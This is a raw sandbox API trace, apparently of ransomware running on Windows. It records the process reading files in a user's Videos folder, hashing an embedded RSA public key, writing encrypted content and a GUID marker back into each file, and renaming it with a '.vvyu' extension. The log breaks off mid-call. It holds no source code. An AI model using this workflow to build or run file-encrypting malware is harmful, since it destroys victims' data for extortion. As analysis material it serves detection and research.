HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d08 [0195.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0195.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cc0 [0195.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2ca8 [0195.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0195.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0195.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0195.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0195.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0195.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0195.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.481] GetCurrentThreadId () returned 0x66c [0195.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0195.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea07c0 [0195.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0195.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.482] GetCurrentThreadId () returned 0x66c [0195.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0195.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d08 [0195.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ca8 [0195.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0195.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cc0 [0195.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c90 [0195.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d20 [0195.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0195.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cf0 [0195.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cd8 [0195.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d38 [0195.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cd8 [0195.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0195.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0195.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ca8 [0195.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea4a68 [0195.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0195.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea4c78 [0195.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0195.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0195.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea4e90 [0195.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4c78 | out: hHeap=0x620000) returned 1 [0195.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e90 | out: hHeap=0x620000) returned 1 [0195.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1410 | out: hHeap=0x620000) returned 1 [0195.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0195.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.493] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xeef0, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xeef0, lpOverlapped=0x0) returned 1 [0195.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.494] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xeef5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.494] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea4a68 [0195.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea4a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea4e98 [0195.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.497] WriteFile (in: hFile=0x568, lpBuffer=0x2ea4e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea4e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e98 | out: hHeap=0x620000) returned 1 [0195.498] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.498] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.498] CloseHandle (hObject=0x568) returned 1 [0195.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0195.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea4a68 [0195.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0195.500] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\hDvzuhrdv.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\hdvzuhrdv.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\hDvzuhrdv.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\hdvzuhrdv.mkv.vvyu")) returned 1 [0195.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.502] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.505] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1383f500, ftCreationTime.dwHighDateTime=0x1d89d4c, ftLastAccessTime.dwLowDateTime=0xf6229e60, ftLastAccessTime.dwHighDateTime=0x1d8a063, ftLastWriteTime.dwLowDateTime=0xf6229e60, ftLastWriteTime.dwHighDateTime=0x1d8a063, nFileSizeHigh=0x0, nFileSizeLow=0x1138e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K0ZMIj7SN.mp4", cAlternateFileName="K0ZMIJ~1.MP4")) returned 1 [0195.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1410 [0195.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb45f0 [0195.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1410 | out: hHeap=0x620000) returned 1 [0195.506] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\K0ZMIj7SN.mp4") returned=".mp4" [0195.506] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\K0ZMIj7SN.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\k0zmij7sn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.507] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=70542) returned 1 [0195.507] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.510] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x11368, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.510] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.512] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.512] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x1138e, lpOverlapped=0x0) returned 1 [0195.513] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.513] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.513] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.513] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0195.515] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0195.515] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.515] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0195.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0195.515] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0195.515] GetLastError () returned 0x0 [0195.515] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0195.515] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0195.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.515] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0195.515] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0195.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.515] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0195.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11390) returned 0x2ea79b0 [0195.516] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1410 [0195.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c78 [0195.517] RtlAllocateHeap 